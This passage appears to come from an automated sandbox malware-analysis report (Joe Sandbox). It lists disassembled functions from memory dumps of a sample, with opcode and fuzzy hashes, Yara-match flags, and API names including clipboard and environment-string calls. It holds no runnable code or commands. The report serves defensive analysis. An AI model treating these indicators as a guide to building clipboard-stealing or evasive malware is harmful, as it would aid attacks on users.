                                                                        • Instruction Fuzzy Hash: 1241247160C2615FE3189E39C89037ABBD2DBC5354F04CA7EE4E9877D2D638884ADB45
                                                                        Function 0056F667 Relevance: .1, Instructions: 134COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2346451120.0000000000560000.00000040.00001000.00020000.00000000.sdmp, Offset: 00560000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_560000_38F9.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 69970d3ec877a5501d78b087801963f1341c5ba9f32c0b280cd2124785c4c6f8
                                                                        • Instruction ID: cced49072be6dc487b55d50c545cf73c20bd55532240023deb3143222b5739e0
                                                                        • Opcode Fuzzy Hash: 69970d3ec877a5501d78b087801963f1341c5ba9f32c0b280cd2124785c4c6f8
                                                                        • Instruction Fuzzy Hash: 3741E675A082615FE3089A3DD89037ABFD2EFC5354F15CA6DE0D9873E5D6388846DB01
                                                                        Function 00404EF0 Relevance: .1, Instructions: 116COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2346072307.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000006.00000002.2346072307.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_400000_38F9.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 715d4e1a56a60a2aa537aa42d7826f17c876bdac566d208033b001f6f4d104f9
                                                                        • Instruction ID: 09b51193ffce78eae9cd24ccb79c874a3196245145ede4469a31f63818c12293
                                                                        • Opcode Fuzzy Hash: 715d4e1a56a60a2aa537aa42d7826f17c876bdac566d208033b001f6f4d104f9
                                                                        • Instruction Fuzzy Hash: 40418CB16116058BDB58CF19C88475277E2ABC4324F18C1BAEE019F3CADB79D989CF85
                                                                        Function 00565157 Relevance: .1, Instructions: 116COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2346451120.0000000000560000.00000040.00001000.00020000.00000000.sdmp, Offset: 00560000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_560000_38F9.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 715d4e1a56a60a2aa537aa42d7826f17c876bdac566d208033b001f6f4d104f9
                                                                        • Instruction ID: 8a8a8ed7d47116aebbd6fbf03f502417ed8e4cc7a1f7ff1ae5fd24008bab826a
                                                                        • Opcode Fuzzy Hash: 715d4e1a56a60a2aa537aa42d7826f17c876bdac566d208033b001f6f4d104f9
                                                                        • Instruction Fuzzy Hash: 84419FB1751A048BDB588F19C8847527BE2BF84324F18C1A9DD418F38AEB79C989CF81
                                                                        Function 00576248 Relevance: .1, Instructions: 112COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2346451120.0000000000560000.00000040.00001000.00020000.00000000.sdmp, Offset: 00560000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_560000_38F9.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 9adba35ec3703a7164c5ea854a77521608906d116942ee9f3be7fb12b250ff6a
                                                                        • Instruction ID: 69ccd684e2b8bedeb477c96735daf1a4d42d20fb6a90c449c3b9326958526c4b
                                                                        • Opcode Fuzzy Hash: 9adba35ec3703a7164c5ea854a77521608906d116942ee9f3be7fb12b250ff6a
                                                                        • Instruction Fuzzy Hash: 2941A9B45083528BD724CF14C8607ABBBE1FFC5354F048A1CE9DA9B781E7389A45CB86
                                                                        Function 004138D2 Relevance: .1, Instructions: 103COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2346072307.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000006.00000002.2346072307.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_400000_38F9.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 6ade29e094f5bf3b532b4228ecb4d26e4fbbb4186f72e2cfaa1089f32ceae6d7
                                                                        • Instruction ID: 2686aa34b6a76b27f20ffd05abd75c1ce39c7f7e6e1673e9cdff4e5e0361a673
                                                                        • Opcode Fuzzy Hash: 6ade29e094f5bf3b532b4228ecb4d26e4fbbb4186f72e2cfaa1089f32ceae6d7
                                                                        • Instruction Fuzzy Hash: A73134B19187118BD725CF14C8817BBB7D4AB85315F08143EE88997382EB7C9984CB9A
                                                                        Function 004025A0 Relevance: .1, Instructions: 95COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2346072307.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000006.00000002.2346072307.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_400000_38F9.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 7e394665ba781b0250695dffab2978dfaadb1877bc08883ebb4c543b78d81760
                                                                        • Instruction ID: 1173fd14226b6f9772cf5791de5bc0a1936854a118f46feab6fed66326430bb7
                                                                        • Opcode Fuzzy Hash: 7e394665ba781b0250695dffab2978dfaadb1877bc08883ebb4c543b78d81760
                                                                        • Instruction Fuzzy Hash: 0931CA316046009BD7149E59CA84927B7E1FFC4318F18897EE899E73C1D67ADC42DB4A
                                                                        Function 00562807 Relevance: .1, Instructions: 95COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2346451120.0000000000560000.00000040.00001000.00020000.00000000.sdmp, Offset: 00560000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_560000_38F9.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: c67830654ad6e4d523287e63485f7401f2c3fa94643f1caaf398f55fe42cf3ef
                                                                        • Instruction ID: 16531cc0acf039648d201ac7b0480423d63f57d7c9c66578567a890aeb9c58f0
                                                                        • Opcode Fuzzy Hash: c67830654ad6e4d523287e63485f7401f2c3fa94643f1caaf398f55fe42cf3ef
                                                                        • Instruction Fuzzy Hash: C5318171B047019BD7549E58CC80A3ABBF1FFC9358F188A2DE899AB251D735DD42CB42
                                                                        Function 00440D36 Relevance: .1, Instructions: 89COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2346072307.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000006.00000002.2346072307.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_400000_38F9.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 63a2bfe27c6966d50c0fe34e9c7c8675319f6a27cf5de917e4788303bb19de49
                                                                        • Instruction ID: e355dcfae9e044697576bbfde22a8f19920d75dde12cc047ec3e3f6d5b1960e9
                                                                        • Opcode Fuzzy Hash: 63a2bfe27c6966d50c0fe34e9c7c8675319f6a27cf5de917e4788303bb19de49
                                                                        • Instruction Fuzzy Hash: 8B41BA70418690DFD775DB3081A9DBA7FF1BE0A21538B54EEC0869F4A3EA34D186DB05
                                                                        Function 00431680 Relevance: .1, Instructions: 64COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2346072307.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000006.00000002.2346072307.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_400000_38F9.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                        • Instruction ID: eaecee785cbc552ffb01b79b63469848f54c5be3ad95e1fd29ce6da9ec180bfb
                                                                        • Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                        • Instruction Fuzzy Hash: DD110C33A051D40FC3168D7C8410565BFE30AA7275F5D539AF4B49B2E2D6278D8B8359
                                                                        Function 005918E7 Relevance: .1, Instructions: 64COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2346451120.0000000000560000.00000040.00001000.00020000.00000000.sdmp, Offset: 00560000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_560000_38F9.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                        • Instruction ID: f9750fa5ba16fd2ffa8ded9e18b41324427fbf98bafc1441c2bc3ac706b2a0a4
                                                                        • Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                        • Instruction Fuzzy Hash: D511E933A055E50DCB168D3C8410569BFE32AA3675F194399F4F59B2D3D6238D8B8368
                                                                        Function 004248E0 Relevance: .1, Instructions: 63COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2346072307.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000006.00000002.2346072307.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_400000_38F9.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 3c6e75e77f2793fa66be3b8d5d79a72f82814c949ef93b88d2ba461be01c1880
                                                                        • Instruction ID: 20b21e30a0ec0fb2c99107143c2b9476f8de25489f108ff1004ace05f2c41b4d
                                                                        • Opcode Fuzzy Hash: 3c6e75e77f2793fa66be3b8d5d79a72f82814c949ef93b88d2ba461be01c1880
                                                                        • Instruction Fuzzy Hash: DB0192F9B0071147E620AF25F8C1727A2A89BC1718F58483EE84457342DB7DEC44C6A9
                                                                        Function 00584B47 Relevance: .1, Instructions: 63COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2346451120.0000000000560000.00000040.00001000.00020000.00000000.sdmp, Offset: 00560000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_560000_38F9.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 50b9835be22db13bef9f7ab1f5ab60fde322d087d11911c3f840fccf15ba697c
                                                                        • Instruction ID: b74f6d644c69de29889baac74e493b8fdcf59e06ca0245518cc6899b1d76c221
                                                                        • Opcode Fuzzy Hash: 50b9835be22db13bef9f7ab1f5ab60fde322d087d11911c3f840fccf15ba697c
                                                                        • Instruction Fuzzy Hash: 7C019AF1B0034347EB20AE50C4C5B3BAAB87F90719F09412CEC1967201EB76EC15CBA1
                                                                        Function 004381BB Relevance: .1, Instructions: 57COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2346072307.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000006.00000002.2346072307.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_400000_38F9.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: f95921265e9851a63917028a6ef760884a350e0ab274218a1fd4096a17488e74
                                                                        • Instruction ID: 834250698d5e0500e56c7bb278610784be947653ec03dbaf781bc3f884b91dae
                                                                        • Opcode Fuzzy Hash: f95921265e9851a63917028a6ef760884a350e0ab274218a1fd4096a17488e74
                                                                        • Instruction Fuzzy Hash: 2A1134B01083458BD714CF51C1A066BF7E1FF89788F14995EE4D19B251D7BCD909CB8A
                                                                        Function 004106B1 Relevance: .0, Instructions: 50COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2346072307.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000006.00000002.2346072307.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_400000_38F9.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 0d71a57cd882e273a6c56ce9b72a8ed7186c85e47ae9bb2a3c29e23a8caddaad
                                                                        • Instruction ID: 889cefc2f7097b9c6db9ab6823b190a93607d6c31bc0b71ec5331936f27af802
                                                                        • Opcode Fuzzy Hash: 0d71a57cd882e273a6c56ce9b72a8ed7186c85e47ae9bb2a3c29e23a8caddaad
                                                                        • Instruction Fuzzy Hash: A711F5746093808BE324DF14C8A4B9FFBF1BB86304F044A2DE5959B2D1D7BA9845CF86
                                                                        Function 00570918 Relevance: .0, Instructions: 50COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2346451120.0000000000560000.00000040.00001000.00020000.00000000.sdmp, Offset: 00560000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_560000_38F9.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 0d71a57cd882e273a6c56ce9b72a8ed7186c85e47ae9bb2a3c29e23a8caddaad
                                                                        • Instruction ID: de1a0ff19150e9f38509c8988f29e3e9946aaab3b5d3611368d0a423d2c0eec9
                                                                        • Opcode Fuzzy Hash: 0d71a57cd882e273a6c56ce9b72a8ed7186c85e47ae9bb2a3c29e23a8caddaad
                                                                        • Instruction Fuzzy Hash: DB11F574609380CBE324DF14C864B5FFBF1BF82304F045A1CE6858B291D77A9805CB86
                                                                        Function 0040FBB4 Relevance: .0, Instructions: 41COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2346072307.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000006.00000002.2346072307.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_400000_38F9.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 52f227c8592f5c2cc3229bd8a018e3a24b41eaee9032ee69e0cbf16b167d9f9e
                                                                        • Instruction ID: e698e1f68e38f1bc9b47cf2ac497e118824270fadebddc114e7481b80e060ba0
                                                                        • Opcode Fuzzy Hash: 52f227c8592f5c2cc3229bd8a018e3a24b41eaee9032ee69e0cbf16b167d9f9e
                                                                        • Instruction Fuzzy Hash: 90115B741883C28BE3348F04D864BEFB7E1BB86345F48183DD899962C2D37988558F4A
                                                                        Function 0056FE1B Relevance: .0, Instructions: 41COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2346451120.0000000000560000.00000040.00001000.00020000.00000000.sdmp, Offset: 00560000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_560000_38F9.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 52f227c8592f5c2cc3229bd8a018e3a24b41eaee9032ee69e0cbf16b167d9f9e
                                                                        • Instruction ID: c54b8c56c913a25e0c751ee33ab2246c4aa6ce4b460dc08c06a5c1f6fbc5db4d
                                                                        • Opcode Fuzzy Hash: 52f227c8592f5c2cc3229bd8a018e3a24b41eaee9032ee69e0cbf16b167d9f9e
                                                                        • Instruction Fuzzy Hash: 131169701483C28BD3348F14D8A4BEFBBE1BBC6345F48183CD89987282C3BA88518F46
                                                                        Function 00438F15 Relevance: .0, Instructions: 24COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2346072307.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000006.00000002.2346072307.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_400000_38F9.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: fb520afb4c7028e21bc1d123390b4ebc175e9035a42cbe707a82af3ce4ea84c5
                                                                        • Instruction ID: fea6b9262a02cc5a27262c34f28cf05daf4f77e687b26c47e49c1a77e78bbb2c
                                                                        • Opcode Fuzzy Hash: fb520afb4c7028e21bc1d123390b4ebc175e9035a42cbe707a82af3ce4ea84c5
                                                                        • Instruction Fuzzy Hash: 03E04FBB9112608BCBA88F24D991576F7B1EB47F50B59601EE446F7350DA34EC00CB0A
                                                                        Function 0059917C Relevance: .0, Instructions: 24COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2346451120.0000000000560000.00000040.00001000.00020000.00000000.sdmp, Offset: 00560000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_560000_38F9.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: fb520afb4c7028e21bc1d123390b4ebc175e9035a42cbe707a82af3ce4ea84c5
                                                                        • Instruction ID: 548f4f7eff52a0f482590595e6398fe819f4faf2211621dd05df3ce001f22f5c
                                                                        • Opcode Fuzzy Hash: fb520afb4c7028e21bc1d123390b4ebc175e9035a42cbe707a82af3ce4ea84c5
                                                                        • Instruction Fuzzy Hash: 52E04FBE9512A08BCF68CF24D891572B7B0FB43F50B59501DE446E7250D634EC00DB06
                                                                        Function 005812E0 Relevance: .0, Instructions: 22COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2346451120.0000000000560000.00000040.00001000.00020000.00000000.sdmp, Offset: 00560000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_560000_38F9.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 262a0625e730f3a272db31694606eccad8b6e132ec4b2629bc2c27a0c5ad0a2d
                                                                        • Instruction ID: 0d0601c300bb0425d4d72e85ad171890025cc1115336e936d81511390fbf9069
                                                                        • Opcode Fuzzy Hash: 262a0625e730f3a272db31694606eccad8b6e132ec4b2629bc2c27a0c5ad0a2d
                                                                        • Instruction Fuzzy Hash: B6E0C294608D8387C7199E399470336FFED7F03306F2895B9DCC2EB841EA25E8424308
                                                                        Function 0040CB10 Relevance: .0, Instructions: 21COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2346072307.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000006.00000002.2346072307.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_400000_38F9.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
                                                                        • Instruction ID: 15f5a020169ecd94f448affbf7eac2585d4a5225e6d21b45986e377c0b9b8dd8
                                                                        • Opcode Fuzzy Hash: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
                                                                        • Instruction Fuzzy Hash: 52D0A7715487A14ED7588E3824E157BFBF8E947612B1825AFE4D1F3245D234EC01879D
                                                                        Function 0056CD77 Relevance: .0, Instructions: 21COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2346451120.0000000000560000.00000040.00001000.00020000.00000000.sdmp, Offset: 00560000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_560000_38F9.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
                                                                        • Instruction ID: 8f1e1833cc5af3d582c6c44f9534ac05879cc899a485dffb13e07affb0157a64
                                                                        • Opcode Fuzzy Hash: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
                                                                        • Instruction Fuzzy Hash: 88D0A7716497E10E5B58CD3804A0877FFF4F947612F1814AEE4D2E7105D220DC018798
                                                                        Function 005E328F Relevance: .0, Instructions: 13COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2346623744.00000000005DD000.00000040.00000020.00020000.00000000.sdmp, Offset: 005DD000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_5dd000_38F9.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 84637ed40dc845524da0f22a5c459a29830c068504c1783cee47edcb1d8e9528
                                                                        • Instruction ID: 9c25957a02b0c50e1544ebe2d71411fe246a90e6a9f0a21d5aaf03be7ac13e80
                                                                        • Opcode Fuzzy Hash: 84637ed40dc845524da0f22a5c459a29830c068504c1783cee47edcb1d8e9528
                                                                        • Instruction Fuzzy Hash: 4BD0C962A492CA8ED3128B31818ABD1BFD5AF52200B1E55EAC0E44E456C1289085DF21
                                                                        Function 0057D097 Relevance: .0, Instructions: 7COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2346451120.0000000000560000.00000040.00001000.00020000.00000000.sdmp, Offset: 00560000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_560000_38F9.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: cc8df1d88a68718305d81cb7bbe64538c0baeb9b6a0cc46f2b02e3b4a1a8a6cf
                                                                        • Instruction ID: 699feb5ee3d94f7cfc0a453b2fe9a3727c550fe2d3f5ff42bb8cfa63ada4f839
                                                                        • Opcode Fuzzy Hash: cc8df1d88a68718305d81cb7bbe64538c0baeb9b6a0cc46f2b02e3b4a1a8a6cf
                                                                        • Instruction Fuzzy Hash: D6A00238A4550187D104DF00D690475B335738B501B50B154D615231568B60D401C55C
                                                                        Function 0057CF1A Relevance: .0, Instructions: 7COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2346451120.0000000000560000.00000040.00001000.00020000.00000000.sdmp, Offset: 00560000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_560000_38F9.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 03f580e30a6611fca79c1431b30a1db64368cf35633a261591e3f40f90ed873e
                                                                        • Instruction ID: 3ef96da8efbfa169e98678a181f5cf30cbc18a4f7711341d604041cc041c4401
                                                                        • Opcode Fuzzy Hash: 03f580e30a6611fca79c1431b30a1db64368cf35633a261591e3f40f90ed873e
                                                                        • Instruction Fuzzy Hash: C5A0022DD8A042DD81301FBA55142B4E3B99BC7321F59B865511C330614971D401C56D
                                                                        Function 0058EEF7 Relevance: 50.9, APIs: 4, Strings: 25, Instructions: 184COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2346451120.0000000000560000.00000040.00001000.00020000.00000000.sdmp, Offset: 00560000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_560000_38F9.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Object$DeleteSelect
                                                                        • String ID: $(ID$07D$07D$07D$07D$07D$07D$07D$07D$07D$07D$07D$07D$07D$07D$4ID$@ID$LID$XID$dID$pID$|ID$HD$HD
                                                                        • API String ID: 618127014-763545205
                                                                        • Opcode ID: 39b23aab81d1e412ac723355e7e0d380e93785fe029945261b041932a7300441
                                                                        • Instruction ID: 60327d0f96a7b3deecf0ce21178eeb5ed9b1cd1e9f4d058b5d703ebe2579cb86
                                                                        • Opcode Fuzzy Hash: 39b23aab81d1e412ac723355e7e0d380e93785fe029945261b041932a7300441
                                                                        • Instruction Fuzzy Hash: C8B18CB85093808FE364DF29D58579BBBE0ABC9304F00892EE9D987350D7749548DF8A
                                                                        Function 0058ED17 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 127clipboardCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2346451120.0000000000560000.00000040.00001000.00020000.00000000.sdmp, Offset: 00560000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_560000_38F9.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Clipboard$Global$CloseDataInfoOpenWindowWire
                                                                        • String ID: @$A$C$F
                                                                        • API String ID: 2111159801-319984173
                                                                        • Opcode ID: f102b88c657c0386999a50c9b84d9cf073ded92d13a1d40d33957346412eb39a
                                                                        • Instruction ID: 8022ed7a2f694aa8ae14dfd0a29cf818955d646ae1686b01d6a59b9c1dc2692e
                                                                        • Opcode Fuzzy Hash: f102b88c657c0386999a50c9b84d9cf073ded92d13a1d40d33957346412eb39a
                                                                        • Instruction Fuzzy Hash: D651347050C381CFD310AB28D48A66EBFF4BB96324F540E2EF8D5A7292C73585498B93
                                                                        Function 0057D207 Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 200COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000,?), ref: 0057D307
                                                                        • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,?,?), ref: 0057D334
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2346451120.0000000000560000.00000040.00001000.00020000.00000000.sdmp, Offset: 00560000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_560000_38F9.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: EnvironmentExpandStrings
                                                                        • String ID: K-K/$U5U7$\1B3
                                                                        • API String ID: 237503144-1235027928
                                                                        • Opcode ID: aa3d6e910086139519e9c9cd08a0e925ab7e68abe48d6d60585da4ebcdaefe44
                                                                        • Instruction ID: be55c064e1c8e6c7a1d986bfa0e690acc69a198aeb92a8f18ea173d3615af04d
                                                                        • Opcode Fuzzy Hash: aa3d6e910086139519e9c9cd08a0e925ab7e68abe48d6d60585da4ebcdaefe44
                                                                        • Instruction Fuzzy Hash: 6D6149716083418FD724CF14C890BABBBF5FF86318F058A1DE8DA5B281D7B49905DBA6
                                                                        Function 0057D205 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 198COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000,?), ref: 0057D307
                                                                        • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,?,?), ref: 0057D334
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2346451120.0000000000560000.00000040.00001000.00020000.00000000.sdmp, Offset: 00560000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_560000_38F9.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: EnvironmentExpandStrings
                                                                        • String ID: K-K/$U5U7$\1B3
                                                                        • API String ID: 237503144-1235027928
